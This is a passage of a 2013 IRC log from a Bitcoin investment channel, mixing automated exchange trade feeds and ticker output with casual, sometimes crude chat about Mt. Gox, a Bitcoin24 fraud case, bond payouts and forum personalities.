[S.DICE-PT] 32 @ 0.003545 = 0.1134 BTC [+] Apr 27 20:59:32 [BTCTC] [S.DICE-PT] 32 @ 0.00355 = 0.1136 BTC [+] Apr 27 21:17:15 lol reptilia wants to outdo mp... by posting pics of girls? hahahaha Apr 27 21:28:21 [BTCTC] [ASICMINER-PT] 1 @ 1.2151 BTC [-] Apr 27 21:34:07 $avg Apr 27 21:34:09 jurov: 133.77 Apr 27 21:34:13 mircea_popescu: something happening? no bond/dividend payouts, mpoe bot absent despite bitcoincharts is online? Apr 27 21:35:02 [MPEX] [S.DICE] 3000 @ 0.003 = 9 BTC [-] Apr 27 21:36:45 That milton friedman video is the tits Apr 27 21:36:46 thanks Apr 27 21:37:23 mod6^ Apr 27 21:37:30 or mp Apr 27 21:39:42 ahh, werd. mp posted it. :] Apr 27 21:46:52 jurov: MPOE bot's algo was changed. Now it only tries to undercut existing bids ;-) Apr 27 21:48:58 heh Apr 27 21:49:14 $avg Apr 27 21:49:15 deadweasel: 133.71 Apr 27 21:57:49 [BTCTC] [ASICMINER-PT] 1 @ 1.2554 BTC [+] Apr 27 21:59:13 [BTCTC] [ASICMINER-PT] 1 @ 1.2555 BTC [+] Apr 27 21:59:58 [BTCTC] [BTC-BOND] 2 @ 0.00983 = 0.0197 BTC [-] Apr 27 22:00:00 [BTCTC] [ASICMINER-PT] 1 @ 1.2555 BTC [+] Apr 27 22:00:54 [BTCTC] [BTC-BOND] 30 @ 0.00982 = 0.2946 BTC [-] Apr 27 22:01:05 [BTCTC] [BTC-BOND] 1 @ 0.00982 BTC [-] Apr 27 22:01:49 [BTCTC] [BTC-TRADING-PT] 1 @ 0.249 BTC [+] Apr 27 22:03:07 [BTCTC] [BTC-TRADING-PT] 1 @ 0.2 BTC [-] Apr 27 22:04:48 [BTCTC] [BTC-BOND] 10 @ 0.00981 = 0.0981 BTC [-] Apr 27 22:05:16 [BTCTC] [ESECURITYSABTC] 1 @ 0.33998 BTC [-] Apr 27 22:07:27 [BTCTC] [BTC-BOND] 3 @ 0.009999 = 0.03 BTC [+] Apr 27 22:11:11 ;;bc,stats Apr 27 22:11:14 Current Blocks: 233446 | Current Difficulty: 8974296.01488785 | Next Difficulty At Block: 233855 | Next Difficulty In: 409 blocks | Next Difficulty In About: 2 days, 13 hours, 44 minutes, and 9 seconds | Next Difficulty Estimate: 9932920.63166 | Estimated Percent Change: 10.68189 Apr 27 22:25:01 [BTCTC] [ASICMINER-PT] 1 @ 1.259 BTC [+] Apr 27 22:29:00 [HAVELOCK] [HIM] 1 @ 1.7201 BTC [+] Apr 27 22:30:31 ;;gettrust aethero Apr 27 22:30:31 Trust relationship from user jurov to user aethero: Level 1: 0, Level 2: 2 via 2 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=jurov&dest=aethero Apr 27 22:42:16 https://bitcointalk.org/index.php?topic=188546.0 lol the hunt for satoshi signature Apr 27 22:46:23 [BTCTC] [ASICMINER-PT] 1 @ 1.259 BTC [+] Apr 27 22:50:49 [MPEX] [S.MPOE] 465 @ 0.00069796 = 0.3246 BTC [+] Apr 27 22:50:51 [MPEX] [S.MPOE] 4000 @ 0.00069909 = 2.7964 BTC [+] Apr 27 22:51:01 [MPEX] [S.MPOE] 635 @ 0.0006991 = 0.4439 BTC [+] Apr 27 22:54:48 ;;asks 139 Apr 27 22:54:49 There are currently 8802.0334 bitcoins offered at or under 139.0 USD, worth 1180181.77601 USD in total. | Data vintage: 1.6649 seconds Apr 27 22:54:59 ;;ticker Apr 27 22:55:00 BTCUSD ticker | Best bid: 126.00000, Best ask: 126.01001, Bid-ask spread: 0.01001, Last trade: 126.00000, 24 hour volume: 55701.10914739, 24 hour low: 124.03000, 24 hour high: 139.88000, 24 hour vwap: 133.15565 Apr 27 22:56:49 PANIC SELL Apr 27 22:56:51 PANIC SELL Apr 27 22:57:04 [BTCTC] [BASIC-MINING] 1 @ 0.4199 BTC [-] Apr 27 22:58:51 [BTCTC] [ASICMINER-PT] 1 @ 1.259 BTC [+] Apr 27 22:59:00 [HAVELOCK] [VTX] 1 @ 0.4611 BTC [-] Apr 27 23:00:20 [BTCTC] [ASICMINER-PT] 1 @ 1.2591 BTC [+] Apr 27 23:00:39 ;;ticker Apr 27 23:00:39 BTCUSD ticker | Best bid: 127.00010, Best ask: 127.99000, Bid-ask spread: 0.98990, Last trade: 127.99000, 24 hour volume: 56522.23429988, 24 hour low: 124.03000, 24 hour high: 139.88000, 24 hour vwap: 133.02704 Apr 27 23:00:49 ;;ticker Apr 27 23:00:50 BTCUSD ticker | Best bid: 127.90327, Best ask: 127.98000, Bid-ask spread: 0.07673, Last trade: 127.98000, 24 hour volume: 56569.11167357, 24 hour low: 124.03000, 24 hour high: 139.88000, 24 hour vwap: 133.02114 Apr 27 23:01:15 ;;ticker Apr 27 23:01:16 BTCUSD ticker | Best bid: 131.31197, Best ask: 132.49000, Bid-ask spread: 1.17803, Last trade: 132.49000, 24 hour volume: 56569.11167357, 24 hour low: 124.03000, 24 hour high: 139.88000, 24 hour vwap: 133.02114 Apr 27 23:01:33 PANIC BUY Apr 27 23:01:37 PANIC BUY Apr 27 23:01:57 [BTCTC] [ASICMINER-PT] 2 @ 1.2592 = 2.5184 BTC [+] Apr 27 23:04:19 anyone would like to bet how much this auction ends up? https://bitcointalk.org/index.php?topic=186198.20 Apr 27 23:05:40 seems casacius 1st series price is lifting off Apr 27 23:08:20 120-150 Apr 27 23:09:14 that would be quite a madness Apr 27 23:10:25 4/5 each ? easy ! its 900$ on ebay Apr 27 23:12:22 i just bought one for 2.75 on bitmit... got good deal then Apr 27 23:12:26 try to imagine same suppl but with 10x more collector Apr 27 23:12:43 in 2/3 years Apr 27 23:12:50 [BTCTC] [ASICMINER-PT] 1 @ 1.222201 BTC [-] Apr 27 23:12:53 [BTCTC] [ASICMINER-PT] 1 @ 1.222101 BTC [-] Apr 27 23:12:54 in 2/3 years, yea Apr 27 23:13:01 [BTCTC] [ASICMINER-PT] 1 @ 1.222 BTC [-] Apr 27 23:13:10 [BTCTC] [ASICMINER-PT] 1 @ 1.215 BTC [-] Apr 27 23:13:35 or maybe its a scam bc with bct @1000$ no one would pay x5 premium Apr 27 23:14:21 2.75 it's a good deal yep. Serie 1 ? Apr 27 23:14:44 should be, wolf is reputable.. we'll see what comes Apr 27 23:15:27 not a scam now Apr 27 23:15:31 lol i knew it would come down Apr 27 23:16:00 [HAVELOCK] [VTX] 1 @ 0.4776 BTC [+] Apr 27 23:20:11 [BTCTC] [BITVPS] 10 @ 0.00188 = 0.0188 BTC [+] Apr 27 23:23:31 i have two series 1 Apr 27 23:23:33 from september Apr 27 23:23:37 considering selling one Apr 27 23:39:30 lmao some swiss bank trollbox: https://bitcointalk.org/index.php?topic=182423.msg1958956#msg1958956 Apr 27 23:40:16 jurov, when do you expect MPOE bond payout? Apr 27 23:44:53 [BTCTC] [ASICMINER-PT] 1 @ 1.237 BTC [+] Apr 27 23:45:03 [BTCTC] [ASICMINER-PT] 1 @ 1.239 BTC [+] Apr 27 23:51:00 [HAVELOCK] [SDICE] 1 @ 0.30000001 BTC [-] Apr 27 23:57:23 [BTCTC] [ASICMINER-PT] 1 @ 1.2592 BTC [+] Apr 27 23:57:28 SlipperySlope, don't know. I was asking mp here awhile ago, no reply yet. Apr 27 23:57:32 [BTCTC] [ASICMINER-PT] 1 @ 1.2592 BTC [+] Apr 28 00:02:17 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1975 BTC [-] Apr 28 00:07:31 ;;seen mircea_popescu Apr 28 00:07:31 mircea_popescu was last seen in #bitcoin-assets 7 hours, 50 minutes, and 17 seconds ago: don't worry, it;'s coming Apr 28 00:10:38 whats coming Apr 28 00:10:50 [BTCTC] [ASICMINER-PT] 1 @ 1.238 BTC [-] Apr 28 00:12:13 KRS1, read 10 lines back Apr 28 00:13:32 cnat raed ... better crawl back to #bitcoin-anal Apr 28 00:14:34 (my apologies if KRS-1 is someone else) Apr 28 00:15:48 ;) Apr 28 00:19:10 ;;bc,stats Apr 28 00:19:14 Current Blocks: 233461 | Current Difficulty: 8974296.01488785 | Next Difficulty At Block: 233855 | Next Difficulty In: 394 blocks | Next Difficulty In About: 2 days, 14 hours, 12 minutes, and 37 seconds | Next Difficulty Estimate: 9935074.73308 | Estimated Percent Change: 10.7059 Apr 28 00:34:59 [HAVELOCK] [SDICE] 2 @ 0.30000001 = 0.6 BTC [-] Apr 28 00:42:02 [HAVELOCK] [VTX] 1 @ 0.4571 BTC [-] Apr 28 00:42:23 [BTCTC] [COGNITIVE] 1 @ 0.176101 BTC [-] Apr 28 00:43:34 [BTCTC] [COGNITIVE] 1 @ 0.1761 BTC [-] Apr 28 00:44:05 [BTCTC] [COGNITIVE] 1 @ 0.17602 BTC [-] Apr 28 00:48:07 [BTCTC] [COGNITIVE] 1 @ 0.17 BTC [-] Apr 28 00:52:29 hi all Apr 28 00:55:00 [HAVELOCK] [VTX] 4 @ 0.4571 = 1.8284 BTC [-] Apr 28 01:01:41 hi mjr___ Apr 28 01:02:35 [BTCTC] [S.DICE-PT] 40 @ 0.00311 = 0.1244 BTC [-] Apr 28 01:02:54 [BTCTC] [S.DICE-PT] 2 @ 0.0031 = 0.0062 BTC [-] Apr 28 01:03:02 [BTCTC] [S.DICE-PT] 1 @ 0.0031 BTC [-] Apr 28 01:04:00 [HAVELOCK] [VTX] 2 @ 0.4679 = 0.9358 BTC [+] Apr 28 01:17:59 [HAVELOCK] [VTX] 7 @ 0.4679 = 3.2753 BTC [+] Apr 28 01:28:21 [MPEX] [S.MPOE] 6200 @ 0.00068812 = 4.2663 BTC [-] Apr 28 01:28:23 [MPEX] [S.MPOE] 2300 @ 0.00068289 = 1.5706 BTC [-] Apr 28 01:28:25 [MPEX] [S.MPOE] 1500 @ 0.00068967 = 1.0345 BTC [+] Apr 28 01:35:59 [HAVELOCK] [VTX] 1 @ 0.477999 BTC [+] Apr 28 01:40:59 [HAVELOCK] [VTX] 1 @ 0.4641 BTC [-] Apr 28 01:41:56 [BTCTC] [ASICMINER-PT] 1 @ 1.2241 BTC [-] Apr 28 01:43:19 geez its hard to get bitcoins or sell bitcoins Apr 28 01:43:47 can't just do an otc trade with someone? Apr 28 01:44:48 tough Apr 28 01:44:55 $20,000 USD in cash Apr 28 01:45:13 not easy to make that happen in one day Apr 28 01:45:19 gox verification queue Apr 28 01:45:25 limits on bitinstant Apr 28 01:45:45 what is the best escrow service? Apr 28 01:46:07 not sure, could ask around in #bitcoin-escrow ? Apr 28 01:46:30 !ident mjr___ Apr 28 01:46:33 ..ident mjr___ Apr 28 01:46:39 meh Apr 28 01:46:42 ;;ident mjr___ Apr 28 01:46:42 Nick 'mjr___', with hostmask 'mjr___!mjr_@cpe-68-174-114-54.nyc.res.rr.com', is identified as user Josh_Rossi, with GPG key id C286BB96FE9B6CD3, key fingerprint 3812AFD43A6B8A057F37D858C286BB96FE9B6CD3, and bitcoin address 1LokQrHj14NU93tC6pZfTZyyRHhAVakQmX Apr 28 01:46:45 ;;ident mjr_ Apr 28 01:46:46 Nick 'mjr_', with hostmask 'MJR_!~mjr_@72.5.43.201', is identified as user Josh_Rossi, with GPG key id C286BB96FE9B6CD3, key fingerprint 3812AFD43A6B8A057F37D858C286BB96FE9B6CD3, and bitcoin address 1LokQrHj14NU93tC6pZfTZyyRHhAVakQmX Apr 28 01:47:10 that's me Apr 28 01:50:59 [HAVELOCK] [VTX] 7 @ 0.4641 = 3.2487 BTC [-] Apr 28 01:58:40 [BTCTC] [CRYPTO-TRADE] 1 @ 0.16 BTC [-] Apr 28 01:58:44 [BTCTC] [CRYPTO-TRADE] 1 @ 0.16 BTC [-] Apr 28 02:01:27 Is mpexbot selling options yet? Apr 28 02:01:52 not yet Apr 28 02:02:45 is there a problem or just waiting til Monday or such? Apr 28 02:04:23 [MPEX] [S.MPOE] 7330 @ 0.00068967 = 5.0553 BTC [+] Apr 28 02:04:25 [MPEX] [S.MPOE] 1874 @ 0.00069036 = 1.2937 BTC [+] Apr 28 02:05:42 ThickAsThieves: no idea Apr 28 02:06:13 :/ Apr 28 02:10:00 [HAVELOCK] [VTX] 8 @ 0.4778 = 3.8224 BTC [+] Apr 28 02:16:24 https://bitcointalk.org/index.php?topic=187730.msg1947140#msg1947140 Apr 28 02:16:34 obvious usagi sock is obvious Apr 28 02:17:58 what would be a good start up Apr 28 02:32:18 Groupon Apr 28 02:33:31 lol Apr 28 02:35:18 [BTCTC] [ASICMINER-PT] 1 @ 1.20296 BTC [-] Apr 28 02:35:26 [BTCTC] [ASICMINER-PT] 1 @ 1.20295 BTC [-] Apr 28 02:35:29 [BTCTC] [ASICMINER-PT] 1 @ 1.20241 BTC [-] Apr 28 02:35:49 love me some daily deals! Apr 28 02:35:59 [HAVELOCK] [VTX] 1 @ 0.4778 BTC [+] Apr 28 02:36:50 [MPEX] [S.MPOE] 8476 @ 0.00069036 = 5.8515 BTC [+] Apr 28 02:38:45 [BTCTC] [ASICMINER-PT] 1 @ 1.2021 BTC [-] Apr 28 02:38:48 [BTCTC] [ASICMINER-PT] 1 @ 1.202 BTC [-] Apr 28 02:51:44 [BTCTC] [ASICMINER-PT] 1 @ 1.2031 BTC [+] Apr 28 02:51:48 [BTCTC] [ASICMINER-PT] 1 @ 1.203 BTC [-] Apr 28 02:54:37 [MPEX] [S.MPOE] 4715 @ 0.0006991 = 3.2963 BTC [+] Apr 28 02:54:39 [MPEX] [S.MPOE] 1885 @ 0.00069922 = 1.318 BTC [+] Apr 28 02:56:59 [HAVELOCK] [VTX] 1 @ 0.4778 BTC [+] Apr 28 03:03:59 [HAVELOCK] [KCIM] 1 @ 1.210001 BTC [+] Apr 28 03:12:34 [BTCTC] [ASICMINER-PT] 1 @ 1.237 BTC [+] Apr 28 03:13:13 [BTCTC] [ASICMINER-PT] 1 @ 1.2497 BTC [+] Apr 28 03:13:57 whoa the miracle Apr 28 03:14:34 jurov well the idea is i publish friday pay next day in case there's errors found or anything. Apr 28 03:14:57 [MPEX] [S.MPOE] 2150 @ 0.00069922 = 1.5033 BTC [+] Apr 28 03:15:27 [BTCTC] [ASICMINER-PT] 1 @ 1.2497 BTC [+] Apr 28 03:16:05 [BTCTC] [ASICMINER-PT] 9 @ 1.2497 = 11.2473 BTC [+] Apr 28 03:16:55 [BTCTC] [ASICMINER-PT] 1 @ 1.2498 BTC [+] Apr 28 03:16:57 so anyone know this Priambelenge guy / Apr 28 03:17:12 nope Apr 28 03:17:26 [BTCTC] [ASICMINER-PT] 6 @ 1.249899 = 7.4994 BTC [+] Apr 28 03:17:28 i noticed that retarded thread is still going though Apr 28 03:17:34 that guy and his diary Apr 28 03:18:03 [BTCTC] [ASICMINER-PT] 1 @ 1.2201 BTC [-] Apr 28 03:18:11 [BTCTC] [ASICMINER-PT] 25 @ 1.22 = 30.5 BTC [-] Apr 28 03:18:20 [BTCTC] [ASICMINER-PT] 1 @ 1.259 BTC [+] Apr 28 03:18:59 ya this guy is like, hi i'm organising an event we will have hedge funds would you like to speak. then he leaves. Apr 28 03:19:08 [BTCTC] [ASICMINER-PT] 1 @ 1.263 BTC [+] Apr 28 03:19:12 i'm like... ok. so if i want to speak what do i do, send a message to your webchat ip ? Apr 28 03:19:13 [BTCTC] [ASICMINER-PT] 1 @ 1.263 BTC [+] Apr 28 03:20:11 [BTCTC] [COGNITIVE] 1 @ 0.175 BTC [+] Apr 28 03:20:24 [BTCTC] [CRYPTO-TRADE] 35 @ 0.198 = 6.93 BTC [+] Apr 28 03:20:46 [BTCTC] [COGNITIVE] 2 @ 0.18 = 0.36 BTC [+] Apr 28 03:22:48 [BTCTC] [ASICMINER-PT] 1 @ 1.201 BTC [-] Apr 28 03:22:51 [BTCTC] [ASICMINER-PT] 30 @ 1.2 = 36 BTC [-] Apr 28 03:24:04 [BTCTC] [ASICMINER-PT] 1 @ 1.20101 BTC [+] Apr 28 03:27:06 [BTCTC] [ASICMINER-PT] 1 @ 1.25899 BTC [+] Apr 28 03:28:38 [MPEX] [O.USD.C320T] 20 @ 0.05733111 = 1.1466 BTC Apr 28 03:29:56 [BTCTC] [ESECURITYSABTC] 1 @ 0.33998 BTC [-] Apr 28 03:29:59 C320? I can sell some of those anytime... Apr 28 03:30:15 [BTCTC] [ESECURITYSABTC] 6 @ 0.33999 = 2.0399 BTC [+] Apr 28 03:30:33 [BTCTC] [ESECURITYSABTC] 5 @ 0.34 = 1.7 BTC [+] Apr 28 03:31:09 [BTCTC] [ESECURITYSABTC] 1 @ 0.33999 BTC [-] Apr 28 03:31:13 [BTCTC] [ESECURITYSABTC] 1 @ 0.36879 BTC [+] Apr 28 03:32:42 lol so offer for less than 5 cents Apr 28 03:39:54 [MPEX] [O.USD.P056T] 50 @ 0.05154951 = 2.5775 BTC Apr 28 03:41:55 !t ^oix Apr 28 03:41:57 Your actions are useless. Apr 28 03:41:59 !t , ^oix Apr 28 03:42:01 Have you got any tobacco? Apr 28 03:42:02 !t m ^oix Apr 28 03:42:03 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 53.25474403 / 53.25474403 / (50 shares, 2.58 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 28 03:42:10 sooo... it's back. lol Apr 28 03:44:36 [MPEX] [O.USD.C260T] 20 @ 0.09950213 = 1.99 BTC [-] Apr 28 03:45:34 !t m ^oix Apr 28 03:45:36 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 53.25474403 / 141.37575896 / 339.46171704 (70 shares, 3.72 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 28 03:45:46 and also balanced now. Apr 28 03:46:59 [HAVELOCK] [VTX] 15 @ 0.477999 = 7.17 BTC [+] Apr 28 03:47:34 mod6 was pretty cool vid fo sho. Apr 28 03:47:52 lol reptilia wants to outdo mp... by posting pics of girls? hahahaha << that thread is epic. Apr 28 03:49:17 SlipperySlope the way this works is, mpoe results are published the weekend after close. i usually try and so far have managed to publish within 1-2 hours of actual close. Apr 28 03:49:30 then the results sit for a day, if anyone finds errors or has q's or w/e. Apr 28 03:49:33 then payments are made. Apr 28 03:49:57 so reasonably anyone depending on mpoe payouts on the end of a month would be making payments no sooner than 24 hours after results published. Apr 28 03:50:33 is there a problem or just waiting til Monday or such? << bitcoincharts was migrating servers or w/e Apr 28 03:51:07 lol Apr 28 03:51:56 o, almost forgot. Apr 28 03:52:02 new gf ---> http://polimedia.us/dtng/c/src/136667488555.jpg Apr 28 03:58:30 [BTCTC] [BTC-BOND] 2 @ 0.009999 = 0.02 BTC [+] Apr 28 03:58:41 [BTCTC] [BTC-BOND] 16 @ 0.009999 = 0.16 BTC [+] Apr 28 04:02:50 [MPEX] [S.MPOE] 5465 @ 0.00069922 = 3.8212 BTC [+] Apr 28 04:02:52 [MPEX] [S.MPOE] 4700 @ 0.00070335 = 3.3057 BTC [+] Apr 28 04:13:08 OUCH Apr 28 04:13:09 http://www.bloomberg.com/video/seeing-huge-increase-in-bitcoin-customers-karpeles-xsmrZuQxQ2CIkPQoeeDJsA.html Apr 28 04:14:23 he's lieing. Apr 28 04:16:03 on which part Apr 28 04:16:15 did you see this vid? Apr 28 04:16:45 [BTCTC] [S.DICE-PT] 15 @ 0.00302 = 0.0453 BTC [-] Apr 28 04:19:00 on the "moar customers" opart. Apr 28 04:19:03 wtf he can't talk or is something stuck up his ass Apr 28 04:19:59 thx for the deets mp Apr 28 04:20:01 my gawd shes gorgeous Apr 28 04:20:33 without even looking at her face lol Apr 28 04:21:30 who ? Apr 28 04:21:50 what is wrong with this dude..what a horrible representation for the exchange Apr 28 04:21:56 [BTCTC] [S.DICE-PT] 30 @ 0.003019 = 0.0906 BTC [-] Apr 28 04:22:31 https://bitcointalk.org/index.php?topic=189093.0 Apr 28 04:22:36 bitcoin24 actually being prosecuted. Apr 28 04:22:53 KRS1 no, actually, i think he's the perfect image of mtgox Apr 28 04:22:56 bloated stupid shit. Apr 28 04:23:47 haha yeah guess you are right..im not impressed with the exchange at all..imo i'd rather have something on a console that actually works instead of something that renders pretty in a browser that doesnt Apr 28 04:24:14 console/terminal Apr 28 04:25:09 [BTCTC] [B.YABMC] 8 @ 0.0163 = 0.1304 BTC [+] Apr 28 04:28:08 [BTCTC] [ASICMINER-PT] 1 @ 1.264 BTC [+] Apr 28 04:34:24 [BTCTC] [RSM] 1 @ 0.0044 BTC [+] Apr 28 04:47:59 [HAVELOCK] [VTX] 1 @ 0.4512 BTC [-] Apr 28 04:54:52 that BTC24 news is interesting. if that's ana ctual hand in the cookie jar investigation because "bitcoin!!", that's actually pretty good. Apr 28 04:55:12 not because bitcoin that should read Apr 28 04:56:26 that;s not what it is. Apr 28 04:56:37 german bank noticed phised money going to X account Apr 28 04:56:54 they asked it be closed down and are investigating the idiot for being part of the ring. Apr 28 04:57:28 ok. well, if he's clean that's great, and if he's not well, he should go to jail. Apr 28 04:58:01 either way, investgation because of fraud better than investigation because "herp derp bitcoin evil" Apr 28 04:58:01 he's going to jail anyway. what's clean mean ? Apr 28 04:58:25 clean in that he's not a knowledgeable party to the fraud. Apr 28 04:58:55 i never heard of any actual prosecution where this was seriously contemplated. Apr 28 04:59:03 fact remains phisher sent the money to his accoutn. Apr 28 04:59:29 he didn't report it as undue with the bank or anything, he's in. Apr 28 05:00:24 fair enough. Apr 28 05:01:14 [BTCTC] [GSDPT] 200 @ 0.003 = 0.6 BTC [-] Apr 28 05:01:24 i mean sure, i'm convinced he's just some random guy who's been operating on some common misrepresentations of how the world works Apr 28 05:01:48 ie, innocent in the ignorance sense of that term. Apr 28 05:01:50 nevertheless... Apr 28 05:02:06 I'm just content that the legal action isn't being based just on the fact he was handling BTC. Apr 28 05:02:19 if it's a legit fraud investigation, than kind of no news really. Apr 28 05:02:28 BTCwise. Apr 28 05:02:59 whether mere fraud is the actual motivator behind it, I doubt we'll ever know. Apr 28 05:03:12 not mere fraud. Apr 28 05:03:18 actual fraud Apr 28 05:03:26 better turn of phrase. Apr 28 05:10:00 [BTCTC] [ASICMINER-PT] 1 @ 1.2301 BTC [-] Apr 28 05:10:13 yeah Apr 28 05:10:26 i'm pretty sure it's not per-btc, just per-fraud. Apr 28 05:18:22 http://www.lysanderspooner.org/node/35 this is a must-read Apr 28 05:18:42 [BTCTC] [BASIC-MINING] 1 @ 0.41 BTC [-] Apr 28 05:24:58 [HAVELOCK] [VTX] 1 @ 0.4681 BTC [+] Apr 28 05:28:56 [BTCTC] [CRYPTO-TRADE] 20 @ 0.1999 = 3.998 BTC [+] Apr 28 05:33:58 [HAVELOCK] [VTX] 2 @ 0.4788 = 0.9576 BTC [+] Apr 28 05:33:59 [HAVELOCK] [VTX] 3 @ 0.4683 = 1.4049 BTC [-] Apr 28 05:43:58 [HAVELOCK] [VTX] 3 @ 0.4651 = 1.3953 BTC [-] Apr 28 05:44:38 [BTCTC] [ASICMINER-PT] 1 @ 1.23 BTC [-] Apr 28 05:47:58 [HAVELOCK] [VTX] 3 @ 0.4788 = 1.4364 BTC [+] Apr 28 05:55:59 [HAVELOCK] [VTX] 3 @ 0.4671 = 1.4013 BTC [-] Apr 28 05:57:29 [BTCTC] [COGNITIVE] 1 @ 0.19 BTC [+] Apr 28 05:58:58 [HAVELOCK] [VTX] 1 @ 0.4788 BTC [+] Apr 28 05:59:33 [BTCTC] [ASICMINER-PT] 1 @ 1.2542 BTC [+] Apr 28 05:59:42 [BTCTC] [ASICMINER-PT] 1 @ 1.269 BTC [+] Apr 28 06:00:34 !t m ^oix Apr 28 06:00:35 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 53.25474403 / 141.37575896 / 339.46171704 (70 shares, 3.72 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 28 06:03:58 [HAVELOCK] [VTX] 2 @ 0.4788 = 0.9576 BTC [+] Apr 28 06:12:51 [BTCTC] [ASICMINER-PT] 10 @ 1.269999 = 12.7 BTC [+] Apr 28 06:13:38 [BTCTC] [ASICMINER-PT] 1 @ 1.288 BTC [+] Apr 28 06:13:49 [BTCTC] [ASICMINER-PT] 10 @ 1.289 = 12.89 BTC [+] Apr 28 06:13:57 [MPEX] [S.MPOE] 1585 @ 0.00070705 = 1.1207 BTC [+] Apr 28 06:13:59 [MPEX] [S.MPOE] 2615 @ 0.00069449 = 1.8161 BTC [-] Apr 28 06:14:41 [BTCTC] [ASICMINER-PT] 10 @ 1.299 = 12.99 BTC [+] Apr 28 06:15:26 [BTCTC] [ASICMINER-PT] 1 @ 1.2989 BTC [-] Apr 28 06:25:59 [HAVELOCK] [VTX] 3 @ 0.4788 = 1.4364 BTC [+] Apr 28 06:27:00 [MPEX] [S.MPOE] 5700 @ 0.00071 = 4.047 BTC [+] Apr 28 06:27:58 [HAVELOCK] [VTX] 9 @ 0.46 = 4.14 BTC [-] **** BEGIN LOGGING AT Sun Apr 28 12:56:03 2013 Apr 28 12:56:26 jurov no it was 12.5 Apr 28 12:57:13 o i see, it's 12.5 in the capital expenses and 12 in mpbor line lol. ty. Apr 28 13:00:22 http://polimedia.us/dtng/c/src/136711955998.jpg Apr 28 13:00:28 and top o' da mornin' to everyone. Apr 28 13:04:14 [BTCTC] [B.YABMC] 2 @ 0.0159 = 0.0318 BTC [-] Apr 28 13:12:39 ,prning Apr 28 13:12:44 i mean morning Apr 28 13:15:18 lol. hi. Apr 28 13:15:24 how's the pietrilla conference ? Apr 28 13:15:39 i think he invited you Apr 28 13:15:43 he updated his thread Apr 28 13:16:02 honestly i dont think anyone will go Apr 28 13:16:12 even if it was going to do something its like a week away Apr 28 13:16:14 or 2 weeks Apr 28 13:16:19 i have no idea why is he going so weird about things. Apr 28 13:16:31 i mean, on the face of it : he seems to have a silver broker business or something. Apr 28 13:16:58 instead of being sane he's been making himself this assclown all over the forum (way before this supernode thing, if you read his history) Apr 28 13:17:00 yeah Apr 28 13:17:01 i just don't get it. Apr 28 13:17:16 i think he just made like a shit load of money and thinks it will keep going up at this rate Apr 28 13:17:30 he doesn't really sound like that to me, but hey. Apr 28 13:17:32 if he bought his 2400 coins at $10 thats a good return for a few months Apr 28 13:17:39 maybe he just cant handle the wealthy Apr 28 13:17:58 get out of here. Apr 28 13:18:06 he bought his coins by selling silver and buying in the 1-200 range Apr 28 13:18:12 he's said so, at that time. Apr 28 13:18:23 i see Apr 28 13:18:25 well... Apr 28 13:18:31 i dont know then Apr 28 13:18:47 maybe he just expects it to go to crazy, he said 300$ for mBTC in 2014 Apr 28 13:19:05 thats like what 20k usd per coins? something silly... Apr 28 13:19:16 300k per coin. Apr 28 13:19:24 1btc = 1k mbtc neh ? Apr 28 13:19:26 thats a bit much Apr 28 13:19:48 http://trilema.com/2013/lets-capture-forum-bugs-in-amber/ Apr 28 13:19:50 maybe he is trying to be a btc player but is just too noob to know wtf he is doing Apr 28 13:20:28 there. if he didn't sell during the collapse, he has some coins bought at 70ish Apr 28 13:20:47 like 2k btc. Apr 28 13:20:55 he said he did not sell at the 200 but told others too Apr 28 13:21:13 he claims to have 2.4k ish btc Apr 28 13:21:19 i mean, if he didn't sell in a panic back in march when btc collapsed to 50, Apr 28 13:21:30 then he might still have 2, heck, 2.5k btc bought at 72 Apr 28 13:22:02 which is a pretty decent gains, whatever, 100k usd or what is it Apr 28 13:22:07 yeah i remember him talking about buying them at 70ish Apr 28 13:22:14 he was trying to get someone to buy for him Apr 28 13:22:14 so then that's it. Apr 28 13:22:22 i wondered if he was a scammer at the time, guess not Apr 28 13:22:33 well, this is all no proof. Apr 28 13:22:37 its in the now locked wall observer thread Apr 28 13:22:51 it's just if we follow his own declarations there's a coherent construction that can be made. Apr 28 13:23:04 he could not even prove he had 13 btc, and lost it to a troll, that was fucking lulz Apr 28 13:23:28 im not sure what his conferance is really about, other than showing off how rich he/we are Apr 28 13:23:31 seems silly Apr 28 13:23:48 well basically mpoe-pr was saying he's trying to copy mine Apr 28 13:24:07 not necessarily a bad idea but he's going assbackwards about things Apr 28 13:24:19 you had a conferance? Apr 28 13:26:30 well yes. Apr 28 13:26:45 i did not get the invite:) Apr 28 13:27:05 well ya, most nobody did. Apr 28 13:27:18 the select comittee on bitcoin affairs. Apr 28 13:27:47 lol Apr 28 13:27:50 was it in romania? Apr 28 13:28:03 yup. Apr 28 13:28:10 http://trilema.com/2013/the-stuff-all-good-conspiracy-theories-start-with/ Apr 28 13:28:15 there, see who you recognise. Apr 28 13:28:45 eric and you Apr 28 13:29:18 i think iv seen the guy on the far left Apr 28 13:29:26 on top photo Apr 28 13:29:37 well that's something. Apr 28 13:30:00 then you pr girl on the lower one Apr 28 13:30:12 thats about it Apr 28 13:30:21 next to her is my cfo and next to her is my lead counsel. Apr 28 13:30:34 yeah id not know them Apr 28 13:30:48 and in the top pic right under me woman behind chair is martha mcculler, my cto Apr 28 13:41:00 i guess this is the only biz in bitcoin with more women than men involved or some shit. Apr 28 13:41:27 what about the brothels that take btc? Apr 28 13:42:03 do those exist yet ? Apr 28 13:42:41 iv been told they do, in eurpe Apr 28 13:43:21 eh this legend with europe Apr 28 13:43:40 before the btc brothel, everyone in bdsm was convinced there exist these magical dungeons "in europe" Apr 28 13:44:05 for some reason everyone thinks everything they can dream up is in europe. sorta like a modern day xanadu Apr 28 13:44:14 iv seen an advertisemnt, could have been a hoax Apr 28 13:44:30 link ? Apr 28 13:44:43 long time ago and it was on tor Apr 28 13:45:01 i dont know it was real or not Apr 28 13:45:11 i was just looking to see what btc operations were on tor Apr 28 13:45:31 evidently some freelancers take btc too Apr 28 13:46:15 well ya. Apr 28 13:46:28 it's weird tho, pretty much the money trail is the only way to make a prostitution bust stick Apr 28 13:46:38 yet afaik the 